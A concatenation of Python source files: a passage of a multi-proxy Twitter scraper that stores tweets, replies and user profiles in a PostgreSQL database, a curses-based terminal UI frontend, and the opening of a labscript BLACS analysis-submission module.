                                   tweets=data['UserTweetsCount'], likes=data['NumberOfFavorites'],
                                   lists=t.user_listed_count)
session.add(user_count) user = User(user_id=data['UserID'], twitter_handle=data['UserScreenName'][:120], user_name=data['UserName'][:120], location=data['user_location'][:255] if data['user_location'] else None, date_joined=data['DateJoined'], timezone=data['TimeZoneUTC'], website=data['Website'][:255] if data['Website'] else None, user_intro=t.user_description[:255] if t.user_description else None, verified=data['is_verified']) user.counts.append(user_count) session.add(user) try: session.commit() except sqlalchemy.exc.IntegrityError as err: if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]): print('ROLLBACK USER') session.rollback() except Exception as e: print(e) raise twit = session.query(Tweet).filter_by(tweet_id=data['tweet_id']).first() if not twit: twit = Tweet(tweet_id=data['tweet_id'], date=datetime.strptime(data['DateOfActivity'], '%d/%m/%Y'), time=data['TimeOfActivity'], timezone=data['TimeZone'][:10] if t.user_timezone else None, retweet_status=data['Re_tweet'], text=data['Tweet'], location=data['Location'][:255] if data['Location'] else None, permalink=data['tweet_url'] if data['tweet_url'] else None, emoticon=','.join(t.emoji) if t.emoji else None) tweet_count = TweetCount(reply=data['NumberOfReplies'], favorite=data['NumberOfFavorites'], retweet=t.retweets_count) if t.is_reply and settings.ISREPLY: url = 'https://twitter.com/' + t.screen_name + '/status/' + str( data['tweet_id']) + '?conversation_id=' + str(t.data_conversation_id) r1 = page.load(url) for tw in PyQuery(r1)('li.js-stream-item'): r_date_time = PyQuery(tw)('span.js-short-timestamp').attr('data-time') r_text = PyQuery(tw)('p.js-tweet-text').text() data_user_id = PyQuery(tw)('div.js-stream-tweet').attr('data-user-id') reply_item_id = PyQuery(tw).attr('data-item-id') e = PyQuery(tw)('img.Emoji') r_emoji = [] for em in e: r_emoji.append(str(PyQuery(em).attr('aria-label').replace('Emoji: ', ''))) if re.search('show_more_button', r1, re.M): # PyQuery(r1)('li.ThreadedConversation-moreReplies').attr('data-expansion-url') u = 'https://twitter.com/i/' + t.screen_name + '/conversation/' + str( t.data_conversation_id) + '?include_available_features=1&include_entities=1&max_position=DAACDwABCgAAAA0NGVYFElfQAQ0ZUm161tABDRlmNLsXUAENGVN_UddwAA0ZYae2FgAADRlT_t6XcAMNGVX62haQBg0ZUn9bF-ABDRlYig7W4AANGVM58xfgAA0ZUxcJ15ABDRlUJzMW0AENGW38gpbQAAgAAwAAAAECAAQAAAA&reset_error_state=false' print('This is an error on purpuse. 
The reply_id is', data['tweet_id']) if not session.query(Reply).filter_by(reply_id=data['tweet_id']).first(): parent_twit = session.query(Tweet).filter_by(tweet_id=t.data_conversation_id).first() TimeOfActivity = time.strftime('%H:%M:%S', time.localtime(int(r_date_time))) DateOfActivity = time.strftime('%d/%m/%Y', time.localtime(int(r_date_time))) reply = Reply(reply_id=reply_item_id, reply_user_id=data_user_id, date=datetime.strptime(DateOfActivity, '%d/%m/%Y'), time=TimeOfActivity, timezone=None, text=r_text, emoticon=','.join(r_emoji) if r_emoji else None) session.add(reply) if parent_twit: parent_twit.replies.append(reply) else: twit.replies.append(reply) try: session.commit() except sqlalchemy.exc.IntegrityError as err: if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]): print('ROLLBACK REPLY') session.rollback() except Exception as e: print(e) raise if not session.query(TweetHashtags).filter_by(tweet_id=data['tweet_id']).first(): for hash_s in hashtags: tweet_hashtag = TweetHashtags(hashtags=hash_s[:45]) twit.hash_s.append(tweet_hashtag) session.add(tweet_hashtag) if not session.query(TweetUrl).filter_by(tweet_id=data['tweet_id']).first(): for url_s in urls: tweet_url = TweetUrl(url=url_s[:255]) twit.url_s.append(tweet_url) session.add(tweet_url) if not session.query(TweetCashtags).filter_by(tweet_id=data['tweet_id']).first(): for cash_s in cashtags: tweet_cashtag = TweetCashtags(cashtags=cash_s[:45]) twit.cash_s.append(tweet_cashtag) session.add(tweet_cashtag) if not session.query(TweetMentions).filter_by(tweet_id=data['tweet_id']).first(): for ment_s in t.ment_s: tweet_mentions = TweetMentions(mentions=ment_s[0][:45], user_id=ment_s[1]) twit.ment_s.append(tweet_mentions) session.add(tweet_mentions) user.tweets.append(twit) twit.counts.append(tweet_count) session.add(tweet_count) session.add(twit) try: session.commit() except sqlalchemy.exc.IntegrityError as err: if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]): print('ROLLBACK USER') session.rollback() except Exception as e: print(e) raise count += 1 lock.acquire() if count > 0: with open('report.csv', 'a') as f: # Add reports to this file data = {} fdnames = ['time', 'query_name', 'number', ] writer = csv.DictWriter(f, lineterminator='\n', fieldnames=fdnames, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL) data['time'] = time.strftime('%Y-%m-%d %H:%M:%S') data['query_name'] = query[1] data['number'] = count writer.writerow(data) lock.release() return count else: with open('error.csv', 'a') as f: # Add errors to this file data = {} fdnames = ['time', 'query_name', 'number', ] writer = csv.DictWriter(f, lineterminator='\n', fieldnames=fdnames, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL) data['time'] = time.strftime('%Y-%m-%d %H:%M:%S') data['query_name'] = query[1] data['number'] = count writer.writerow(data) lock.release() return False def compare_90(string1, string2): if len(string1) == 0 and len(string2) == 0: return True if len(string1) >= len(string2): s1 = string1 s2 = string2 else: s1 = string2 s2 = string1 if len(s2) == 0 and len(s2) != len(s1): return False if float(len(s1) / len(s2)) > float(100 / COEF): return False mismatch_count = 0.0 treshold = float(len(s1) * (1 - (COEF / 100))) for i in range(len(s2)): if s1[i] != s2[i]: mismatch_count += 1.0 if mismatch_count > treshold: return False return True def scrape_query(user_queue, proxy, lock, pg_dsn): db_engine = create_engine(pg_dsn, pool_size=1) add_engine_pidguard(db_engine) DstSession = 
sessionmaker(bind=db_engine, autoflush=False) session = DstSession() active = True while not user_queue.empty(): query, i = user_queue.get() print('START', i, proxy, query) # TODO filter:nativeretweets try: res = scra(query, i, proxy, lock, session=session) except LoadingError: print('LoadingError except') return False if not res: print(' SCRAP_USER Error in', query, i) with open('error_list.txt', 'a') as f: f.write(query[0] + '\n') else: print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), ' ENDED', i, proxy, query, res) return True def get_up(fname, proxy): n = 0 fieldnames = ["QueryStartDate", "QueryEndDate", "Query", "DateOfActivity", "UserScreenName", "Keyword", "Location", "Website", "DateJoined", "IsMention", "UserID", "TimeOfActivity", "Hashtags", "Re_tweet", "NumberOfReplies", "NumberOfRe_tweets", "NumberOfFavorites", "Tweet", "tweet_id", "tweet_url", "is_verified", "Urls", "UserFollowersCount", "UserFollowingCount", "UserTweetsCount", "LikesCount", "CashtagSymbols", "user_location", "permno"] # print('Processing file {} ...'.format(fname)) with open(fname, 'r', encoding='utf-8') as csvfile: reader = csv.DictReader(csvfile) recordlist = [] count = 0 for row in reader: recordlist.append(row) count += 1 # print(' Read {} rows'.format(count)) page = Page(proxy) new_list = [] i = 0 user_profiles = {} tt = time.time() for row in recordlist: tweet = Tweet() try: if user_profiles.get(row['UserScreenName'], None): r = Tweet() rt = user_profiles[row['UserScreenName']] r.user_location = rt['user_location'] r.user_tweet_count = rt['UserTweetsCount'] r.user_following_count = rt['UserFollowingCount'] r.user_followers_count = rt['UserFollowersCount'] r.likes = rt['LikesCount'] r.user_created = rt['DateJoined'] r.website = rt['Website'] r.is_verified = rt['is_verified'] else: try: r = get_user_profile(row['UserScreenName'], page, tweet) except LoadingError: print('Skip user', row['UserScreenName']) r = None if r: tweet = r # print(tweet.likes,tweet.user_tweet_count,tweet.user_following_count,tweet.user_followers_count, # tweet.user_created,tweet.is_verified,tweet.website,tweet.user_location) rt = {} rt['user_location'] = row['user_location'] = tweet.user_location rt['UserTweetsCount'] = row['UserTweetsCount'] = tweet.user_tweet_count rt['UserFollowingCount'] = row['UserFollowingCount'] = tweet.user_following_count rt['UserFollowersCount'] = row['UserFollowersCount'] = tweet.user_followers_count rt['LikesCount'] = row['LikesCount'] = tweet.likes rt['DateJoined'] = row['DateJoined'] = tweet.user_created rt['Website'] = row['Website'] = tweet.website rt['is_verified'] = row['is_verified'] = tweet.is_verified user_profiles[row['UserScreenName']] = rt new_list.append(row) i += 1 k = 50 if i % k == 0: print(' {} Loaded {} user profiles '.format(fname, i)) tt = time.time() except KeyError as e: print('File {} has the wrong content,skipped'.format(fname)) break else: with open(fname, 'w', encoding='utf-8') as csvfile: writer = csv.DictWriter(csvfile, extrasaction='ignore', restval='', lineterminator='\n', fieldnames=fieldnames, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL) writer.writeheader() writer.writerows(new_list) # print('Write {} rows'.format(len(new_list))) n = len(new_list) return n def get_pup(user_queue, proxy): while not user_queue.empty(): fname, i = user_queue.get() print('START', i, proxy, fname) res = get_up(fname, proxy) print('ENDED', i, proxy, fname, res) return True def add_engine_pidguard(engine): """Add multiprocessing guards. 
Forces a connection to be reconnected if it is detected as having been shared to a sub-process. """ @event.listens_for(engine, "connect") def connect(dbapi_connection, connection_record): connection_record.info['pid'] = os.getpid() # Returns the current process id @event.listens_for(engine, "checkout") def checkout(dbapi_connection, connection_record, connection_proxy): pid = os.getpid() if connection_record.info['pid'] != pid: # substitute log.debug() or similar here as desired warnings.warn( "Parent process %(orig)s forked (%(newproc)s) with an open " "database connection, " "which is being discarded and recreated." % {"newproc": pid, "orig": connection_record.info['pid']}) connection_record.connection = connection_proxy.connection = None raise exc.DisconnectionError( "Connection record belongs to pid %s, " "attempting to check out in pid %s" % (connection_record.info['pid'], pid) ) # start of main program if __name__ == '__main__': # making dict with postgres login data pg_config = {'username': settings.PG_USER, 'password': settings.PG_PASSWORD, 'database': settings.PG_DBNAME, 'host': settings.DB_HOST} # postgres connection string pg_dsn = "postgresql+psycopg2://{username}:{password}@{host}:5432/{database}".format(**pg_config) # Construct a base class for declarative class definitions. Base = declarative_base() db_engine = create_engine(pg_dsn) add_engine_pidguard(db_engine) # container object that keeps together many different features of a database (or multiple databases) being described. pg_meta = MetaData(bind=db_engine, schema="fintweet") # Reflect destination tables print('I am here !') # class User(Base): # __table__ = Table('user', pg_meta, autoload=True) # tweets = relationship('Tweet') # counts = relationship('UserCount') # # # class UserCount(Base): # __table__ = Table('user_count', pg_meta, autoload=True) # # # class TweetCount(Base): # __table__ = Table('tweet_count', pg_meta, autoload=True) # # # class TweetMentions(Base): # __table__ = Table('tweet_mentions', pg_meta, autoload=True) # # # class TweetCashtags(Base): # __table__ = Table('tweet_cashtags', pg_meta, autoload=True) # # # class TweetHashtags(Base): # __table__ = Table('tweet_hashtags', pg_meta, autoload=True) # # # class TweetUrl(Base): # __table__ = Table('tweet_url', pg_meta, autoload=True) # # # class Tweet(Base): # __table__ = Table('tweet', pg_meta, autoload=True) # counts = relationship('TweetCount') # ment_s = relationship('TweetMentions') # cash_s = relationship('TweetCashtags') # hash_s = relationship('TweetHashtags') # url_s = relationship('TweetUrl') # class Reply(Base): # __tablename__ = 'reply' # reply_id = Column(BIGINT, primary_key=True) # tweet_id = Column(BIGINT, ForeignKey('tweet.tweet_id')) # reply_user_id = Column(BIGINT) # date = Column(DATE) # time = Column(TIME(6)) # timezone = Column(VARCHAR(10)) # text = Column(TEXT) # emoticon = Column(TEXT) # config = load_config() DstSession = sessionmaker(bind=db_engine, autoflush=False) dstssn = DstSession() if True: # settings.TWEETS: try: command = sys.argv[1] print(command) except IndexError: command = '' if command == 'location': ISLOCATION = True else: ISLOCATION = False user_queue = ThreadQueue() # load excel file for input fname = 'word_list.xlsx' wb = load_workbook(fname) ws = wb.active ii = i = 2 while True: if not ws.cell(row=i, column=1).value: break t1 = str(ws.cell(row=i, column=4).value).lower().strip(' ') t2 = str(ws.cell(row=i, column=5).value).lower().strip(' ') t1 = re.sub(' 00:00:00', '', t1) t2 = re.sub(' 00:00:00', '', t2) 
            permno = str(ws.cell(row=i, column=1).value).lower().strip(' ')
            query = str(ws.cell(row=i, column=2).value).lower().strip(' '), \
                str(ws.cell(row=i, column=3).value).lower().strip(' '), \
                t1, t2, permno
            print(query)
            user_queue.put((query, i))
            i += 1
        pool = ThreadPool(len(settings.PROXY_LIST))
        lock = Lock()
        pool.map(lambda x: (scrape_query(user_queue, x, lock, pg_dsn)), settings.PROXY_LIST)
    else:
        path = '.'
        csv_files = [f for f in os.listdir(path) if f.endswith('.csv')]
        print('Collecting user data from {} files'.format(len(csv_files)))
        # pool = ThreadPool(len(settings.PROXY_LIST))
        # user_queue = ThreadQueue()
        user_queue = Queue()
        i = 0
        for fname in csv_files:
            i += 1
            user_queue.put((fname, i))
        # pool.map(lambda x: (get_pup(user_queue, x)), settings.PROXY_LIST)
        pp = []
        for s in settings.PROXY_LIST:
            p = Process(target=get_pup, args=(user_queue, s))
            p.start()
            pp.append(p)
        # for p in pp: p.join()
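The scraper above repeats the same duplicate-key commit guard three times over (for users, replies, and tweets). A minimal sketch of that pattern pulled into a helper — commit_or_rollback is a hypothetical name, not part of the script, and only the sqlalchemy calls the script itself uses appear here; unlike the inline version, this one re-raises any IntegrityError that is not a duplicate key:

import re
import sqlalchemy

def commit_or_rollback(session):
    # Commit, but tolerate duplicate-primary-key races from concurrent workers.
    try:
        session.commit()
    except sqlalchemy.exc.IntegrityError as err:
        # Another worker inserted the same primary key first; drop our copy.
        if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]):
            session.rollback()
        else:
            raise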
frontend.py
#!/usr/bin/env python """ Another AlphaGriffin Project. """ __author__ = "Eric Petersen @Ruckusist" __copyright__ = "Copyright 2022, The Alpha Griffin Project" __credits__ = ["Eric Petersen", "Shawn Wilson", "@alphagriffin"] __license__ = "***" __version__ = "0.0.6" __maintainer__ = "Eric Petersen" __email__ = "ruckusist@alphagriffin.com" __status__ = "Prototype" import os, sys, time, threading import curses import curses.panel # except ImportError: print("this doesnt work in windows"); exit(1) # new color support reqires this. it should just be there... like print. from itertools import cycle from timeit import default_timer as timer from collections import namedtuple class Cursing: def __init__(self): print("[i] Starting Cursing Frontend.") self.curses = curses # curses.filter() self.screen = curses.initscr() self.palette = [] curses.start_color() self.setup_color() curses.noecho() curses.cbreak() curses.curs_set(0) # 0: invisible, 1: visible, 2: bright self.screen.keypad(1) self.screen.nodelay(1) self.screen_h, self.screen_w = self.screen.getmaxyx() self.screen_mode = True def setup_color(self): """Load a custom theme.""" curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) self.color_rw = curses.color_pair(1) curses.init_pair(2, curses.COLOR_MAGENTA, curses.COLOR_BLACK) self.color_cb = curses.color_pair(2) curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK) self.color_gb = curses.color_pair(3) curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_RED) self.chess_black = curses.color_pair(4) curses.init_pair(5, curses.COLOR_RED, curses.COLOR_WHITE) self.chess_white = curses.color_pair(5) self.color_bold = curses.A_BOLD self.color_blink = curses.A_BLINK self.color_error = self.color_bold | self.color_blink | self.color_rw # Palette of all available colors... == 8 wtf try: for i in range(0, curses.COLORS): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) except: print("failing to setup color!") for i in range(0, 7): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) pass finally: # print(f"len(curses.COLORS) = {len(self.palette)}") # time.sleep(2) pass def get_input(self): """Pass curses control capture to another class.""" x = 0 # self.footer[0].addstr(1, 1, "Mode: KeyStroke") # self.screen.nodelay(True) if self.screen_mode: x = self.screen.getch() try: if int(x) > 0: self.keystroke(x) except: pass else: self.screen.keypad(0) curses.echo() self.redraw_window(self.footer) x = self.footer[0].getstr(1, 1).decode('UTF-8') self.screen.keypad(1) curses.noecho() self.screen_mode = True self.redraw_window(self.footer) return x def refresh(self): """This should check for a screen resize.""" # TODO: add screensize checker! 
# # curses.resizeterm(y, x) self.screen.refresh() curses.panel.update_panels() def end_safely(self): """Return control to the shell.""" curses.nocbreak() self.screen.keypad(0) curses.echo() curses.endwin() print("[*] Ended Safely.") def test(self): self.screen.addstr(0, 0, '[%] this is working.1') self.screen.refresh() self.screen.addstr(1, 0, '[%] this is working.2') self.screen.refresh() time.sleep(5) def make_panel(self, dims, label, scroll=False, box=True, banner=True): """Panel factory.""" panel_type = namedtuple('Panel', 'win panel label dims') win = curses.newwin(dims[0], dims[1], dims[2], dims[3]) win.scrollok(scroll) _panel = curses.panel.new_panel(win) panel = panel_type(win, _panel, label, dims) self.redraw_window(panel, box, banner) return panel def redraw_window(self, panel, box=True, banner=True): """Basic refresh to screen.""" panel.win.erase() if box: panel.win.box() if banner: panel.win.addstr(0, 1, str("| {} |".format(panel.label))) def __call__(self, *args, **kwds) -> None: self.test() self.end_safely() pass class Frontend_TEST(Cursing): def panel_test(self): """Sanity Checks.""" panel_1 = self.make_panel([10, 13, 5, 5], "Panel 1") panel_2 = self.make_panel([10, 13, 8, 8], "Panel 2") curses.panel.update_panels() self.screen.refresh() time.sleep(1) panel_1.panel.top() curses.panel.update_panels() self.screen.refresh() time.sleep(1) for i in range(15): panel_2.panel.move(8, 8 + i) curses.panel.update_panels() self.screen.refresh() time.sleep(0.1) time.sleep(2) def __call__(self) -> None: self.panel_test() self.end_safely() pass class Frontend(Cursing): def recalc_winsizes(self): h = self.screen_h w = self.screen_w # HEADER self.header_dims = [3, w, 0, 0] # WINLEFT self.h_split = int(w / 6) - 1 self.winleft_dims = [h-3-4-3, self.h_split, 3, 0] # WINRIGHT self.v_split = int((h-3-4-3)/6) self.winright_lower_dims = [self.v_split, w - self.h_split-1, h-7-self.v_split, self.h_split + 1] #WINRIGHT AGAIN self.winright_upper_dims = [(h-3-4-3)-self.v_split, w - self.h_split-1, 3, self.h_split + 1] # FOOTER self.footer_dims = [3, w, h-3, 0] # DEBUG self.debug_dims = [4, w, h-7, 0] def splash_screen(self): splash = self.make_panel( [self.screen_h, self.screen_w, 0, 0], "splash", box=False, banner=False ) curses.panel.update_panels() self.screen.refresh() cycled = cycle([x for x in range(len(self.palette))]) for x in range(self.screen_h): if x == int(self.screen_h/2): splash.win.addstr(x, int(self.screen_w/2)-7, " Ruckusist.com") splash.win.refresh() time.sleep(.95) else: matrix = ["&", "^", "&", "$", "R", "\\", "|", "/", "-"] cycled_matrix = cycle([x for x in matrix]) for y in range(self.screen_w): if x == self.screen_h-1 and y == self.screen_w-1: break # hacks. 
splash.win.addstr(x, y, next(cycled_matrix), self.palette[next(cycled)] ) splash.win.refresh() time.sleep(0.0001) time.sleep(2) self.screen.erase() def main_screen(self, header='Deskapp'): """This is attempting a new main panel configuration""" self.recalc_winsizes() self.header = self.make_panel(self.header_dims, header) self.winleft = self.make_panel(self.winleft_dims, "Menu") self.winrightlower = self.make_panel(self.winright_upper_dims, "Panel 3") self.winrightupper = self.make_panel(self.winright_lower_dims, "Messages") self.footer = self.make_panel(self.footer_dims, "Input") self.debug = self.make_panel(self.debug_dims, "Meta") curses.panel.update_panels() self.screen.refresh() def __call__(self) -> None: self.splash_screen() self.main_screen() time.sleep(10) self.end_safely() class Window(object): """The Alphagriffin Curses frontend template.""" def __init__(self, stdscr=None): """Setup basic curses interface.""" if stdscr is None: stdscr = curses.initscr() self.curses = curses self.screen = stdscr self.palette = [] curses.start_color() # curses.use_default_colors() self.setup_color() curses.noecho() curses.cbreak() curses.curs_set(0) # 0: invisible, 1: visible, 2: bright self.screen.keypad(1) self.screen.nodelay(1) self.screen_h, self.screen_w = self.screen.getmaxyx() self.screen_mode = True def get_input(self): """Pass curses control capture to another class.""" x = 0 # self.footer[0].addstr(1, 1, "Mode: KeyStroke") # self.screen.nodelay(True) if self.screen_mode: x = self.screen.getch() try: if int(x) > 0: self.keystroke(x) except: pass else: self.screen.keypad(0) curses.echo() self.redraw_window(self.footer) x = self.footer[0].getstr(1, 1).decode('UTF-8') self.screen.keypad(1) curses.noecho() self.screen_mode = True self.redraw_window(self.footer) return x def setup_color(self): """Load a custom theme.""" curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) self.color_rw = curses.color_pair(1) curses.init_pair(2, curses.COLOR_MAGENTA, curses.COLOR_BLACK) self.color_cb = curses.color_pair(2) curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK) self.color_gb = curses.color_pair(3) curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_RED) self.chess_black = curses.color_pair(4) curses.init_pair(5, curses.COLOR_RED, curses.COLOR_WHITE) self.chess_white = curses.color_pair(5) self.color_bold = curses.A_BOLD self.color_blink = curses.A_BLINK self.color_error = self.color_bold | self.color_blink | self.color_rw # Palette of all available colors... == 8 wtf try: for i in range(0, curses.COLORS): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) except: print("failing to setup color!") for i in range(0, 7): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) pass finally: # print(f"len(curses.COLORS) = {len(self.palette)}") # time.sleep(2) pass def refresh(self): """This should check for a screen resize.""" # TODO: add screensize checker! 
# # curses.resizeterm(y, x) self.screen.refresh() curses.panel.update_panels() def end_safely(self): """Return control to the shell.""" curses.nocbreak() self.screen.keypad(0) curses.echo() curses.endwin() def main_screen(self, msg="RuckusTUI"): """Standard screen template.""" h = self.screen_h w = self.screen_w header_dims = [3, w, 0, 0] split = int(w / 6) - 1 winleft_dims = [h-3-4-3, split, 3, 0] self.winright_dims = [h-3-4-3, w - split-1, 3, split + 1] footer_dims = [3, w, h-3, 0] debug_dims = [4, w, h-7, 0] self.header = self.make_panel(header_dims, "header", box=True) self.winleft = self.make_panel(winleft_dims, "options", True, box=True) self.winright = self.make_panel(self.winright_dims, "screen", True, box=True) self.debug = self.make_panel(debug_dims, "debugs", True, box=True) self.footer = self.make_panel(footer_dims, "interface", True, box=True) self.keystroke = lambda x: self.footer[0].addstr(1, w-9, "<K: {}>".format(x)) curses.panel.update_panels() self.screen.addstr(h-1,w-9,"<{},{}>".format(h, w)) self.screen.addstr(h-1,w-19,"<FPS: 30>".format(h, w)) self.fps = lambda x: self.screen.addstr(h-1,w-19,"<FPS: {}>".format(x)) self.header[0].addstr(1, 1, msg, self.color_gb) self.screen.refresh() def dual_main_screen(self, msg='Message Center'): h = self.screen_h w = self.screen_w h_split = int(w / 6) - 1 v_split = int((h-3-4-3)/6) winright_upper_dims = [v_split, w - h_split-1, h-7-v_split, h_split + 1] self.winright = self.make_panel(winright_upper_dims, "Panel 3") winright_lower_dims = [(h-3-4-3)-v_split, w - h_split-1, 3, h_split + 1] self.winlower = self.make_panel(winright_lower_dims, "Panel 4") def make_panel(self, dims, label, scroll=False, box=True, banner=True): """Panel factory.""" options = {'dims': dims} win = curses.newwin(dims[0], dims[1], dims[2], dims[3]) win.scrollok(scroll) panel = curses.panel.new_panel(win) self.redraw_window([win, panel, label], box, banner) return win, panel, label, options def redraw_window(self, win, box=True, banner=True): """Basic refresh to screen.""" win[0].erase() if box: win[0].box() if banner: win[0].addstr(0, 1, str("| {} |".format(win[2]))) def spash_screen(self, template=None): win, _, _, _ = self.make_panel( [self.screen_h, self.screen_w, 0, 0], "splash", box=False, banner=False ) curses.panel.update_panels() self.screen.refresh() if template: for index, line in enumerate(template): if index == self.screen_h-1: break win.addstr(line[:self.screen_w-4], index, 1) win.refresh() else: # test spashscreen cycled = cycle([x for x in range(len(self.palette))]) for x in range(self.screen_h): if x == int(self.screen_h/2): win.addstr(x, int(self.screen_w/2)-7, " Ruckusist.com") win.refresh() time.sleep(.95) else: matrix = ["&", "^", "&", "$", "R", "\\", "|", "/", "-"] cycled_matrix = cycle([x for x in matrix]) for y in range(self.screen_w): if x == self.screen_h-1 and y == self.screen_w-1: break # hacks. 
win.addstr(x, y, next(cycled_matrix), self.palette[next(cycled)] ) win.refresh() time.sleep(0.0001) time.sleep(2) self.screen.erase() def main_test(self): """Sanity Checks.""" win1, panel1, _, __ = self.make_panel([10, 13, 5, 5], "Panel 1") win2, panel2, _, __ = self.make_panel([10, 13, 8, 8], "Panel 2") curses.panel.update_panels() self.screen.refresh() time.sleep(1) panel1.top() curses.panel.update_panels() self.screen.refresh() time.sleep(1) for i in range(5): panel2.move(8, 8 + i) # curses.panel.update_panels() self.screen.refresh() time.sleep(0.1) # time.sleep(2.5) #self.dialog_box() #self.dialog[1].top() #self.screen.refresh() #time.sleep(2.5) #self.dialog[0].erase() #self.dialog[0].refresh() # self.screen.refresh() # time.sleep(2.5) return True def new_main(self): """This is attempting a new main panel configuration""" h = self.screen_h w = self.screen_w # HEADER header_dims = [3, w, 0, 0] header = self.make_panel(header_dims, "Panel 1") h_split = int(w / 6) - 1 winleft_dims = [h-3-4-3, h_split, 3, 0] winleft = self.make_panel(winleft_dims, "Panel 2") v_split = int((h-3-4-3)/6) winright_upper_dims = [v_split, w - h_split-1, h-7-v_split, h_split + 1] winrightupper = self.make_panel(winright_upper_dims, "Panel 3") winright_lower_dims = [(h-3-4-3)-v_split, w - h_split-1, 3, h_split + 1] winrightlower = self.make_panel(winright_lower_dims, "Panel 4") footer_dims = [3, w, h-3, 0] winfooter = self.make_panel(footer_dims, "Panel 5") debug_dims = [4, w, h-7, 0] windebug = self.make_panel(debug_dims, "Panel 6") curses.panel.update_panels() self.screen.refresh() time.sleep(3) def warning(self, label, text, callback): self.screen.refresh() self.dialog_box(label) win, pan = self.dialog pan.top() win.addstr(1, 2, text, self.palette[7]) start_warning = timer() option = True while timer() <= start_warning + 10: keypress = abs(self.get_input()) if keypress == 260 or keypress == 261: # left/right option = False if option else True elif keypress == 10: # enter break win.addstr(3, 2, "Cancel", self.palette[1] if option else self.palette[0]) win.addstr(3, 9, "Confirm", self.palette[1] if not option else self.palette[0]) win.refresh() self.screen.refresh() if not option: threading.Thread(target=callback).start() win.erase() win.refresh() self.screen.refresh() def error(self, label:str, mesg:list, timeout=10): self.screen.refresh() self.dialog_box(label) win, pan = self.dialog # pan.top() start_timer = timer() counter = 3 # for line in mesg: win.addstr(counter, 2, line, self.palette[7]) counter += 1 win.refresh() self.screen.refresh() # pan.top() while timer() <= start_timer + timeout: time.sleep(0.1) win.erase() win.refresh() self.screen.refresh() def dialog_box(self, label="Warning"): win, panel, _, _ = self.make_panel([ 8, 40, int(self.screen_h/2)-int(7/2), int(self.screen_w/2)-int(40/2) ], label, box=True, banner=True) # win.addstr(3, 2, "Cancel", self.palette[1]) # win.addstr(3, 9, "Confirm") win.refresh() self.dialog = (win, panel) return win, panel def __call__(self): self.spash_screen() time.sleep(5) self.main_test() time.sleep(5) self.dialog_box() self.dialog[1].top() self.screen.refresh() time.sleep(2.5) self.dialog[0].erase() self.dialog[0].refresh() self.screen.refresh() time.sleep(2.5) self.end_safely() def main(): os.system('clear') app = Frontend() app() if __name__ == '__main__': main()
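frontend.py above builds everything on the stdlib curses panel API. As a quick orientation, a self-contained sketch of the window/panel lifecycle that make_panel() and end_safely() wrap — it assumes nothing beyond the stdlib, and curses.wrapper stands in for the module's manual initscr/endwin bookkeeping:

import curses
import curses.panel
import time

def demo(stdscr):
    win = curses.newwin(8, 30, 2, 2)        # height, width, y, x
    win.box()
    win.addstr(0, 1, "| demo |")            # banner, as redraw_window() draws it
    panel = curses.panel.new_panel(win)
    panel.top()                             # raise above any other panels
    curses.panel.update_panels()            # recompute panel stacking
    stdscr.refresh()                        # push the composed screen out
    time.sleep(1)

curses.wrapper(demo)                        # restores the terminal even on error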
analysis_submission.py
##################################################################### # # # /analysis_submission.py # # # # Copyright 2013, Monash University # # # # This file is part of the program BLACS, in the labscript suite # # (see http://labscriptsuite.org), and is licensed under the # # Simplified BSD License. See the license.txt file in the root of # # the project for the full license. # # # ##################################################################### import logging import os import Queue import threading import time import sys if 'PySide' in sys.modules.copy(): from PySide.QtCore import * from PySide.QtGui import * else: from PyQt4.QtCore import * from PyQt4.QtGui import * from qtutils import * from zprocess import zmq_get import labscript_utils.shared_drive class AnalysisSubmission(object): def __init__(self, BLACS, blacs_ui): self.inqueue = Queue.Queue() self.BLACS = BLACS self.port = int(self.BLACS.exp_config.get('ports', 'lyse')) self._send_to_server = False self._server = '' self._server_online = 'offline' self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)),'analysis_submission.ui')) blacs_ui.analysis.addWidget(self._ui) # connect signals self._ui.send_to_server.toggled.connect(lambda state:self._set_send_to_server(state)) self._ui.server.editingFinished.connect(lambda: self._set_server(self._ui.server.text())) self._waiting_for_submission = [] self.mainloop_thread = threading.Thread(target=self.mainloop) self.mainloop_thread.daemon = True self.mainloop_thread.start() self.checking_thread = threading.Thread(target=self.check_connectivity_loop) self.checking_thread.daemon = True self.checking_thread.start() def restore_save_data(self,data): if "server" in data: self.server = data["server"] if "send_to_server" in data: self.send_to_server = data["send_to_server"] if "waiting_for_submission" in data: self._waiting_for_submission = list(data["waiting_for_submission"]) self.inqueue.put(['try again', None]) def get_save_data(self): return {"waiting_for_submission":list(self._waiting_for_submission), "server":self.server, "send_to_server":self.send_to_server } def _set_send_to_server(self,value): self.send_to_server = value def _set_server(self,server): self.server = server @property @inmain_decorator(True) def send_to_server(self): return self._send_to_server @send_to_server.setter @inmain_decorator(True) def send_to_server(self,value): self._send_to_server = bool(value) self._ui.send_to_server.setChecked(self.send_to_server) if not self.send_to_server: self.inqueue.put(['clear', None]) @property @inmain_decorator(True) def server(self): return str(self._server) @server.setter @inmain_decorator(True) def server(self,value): self._server = value self._ui.server.setText(self.server) @property @inmain_decorator(True) 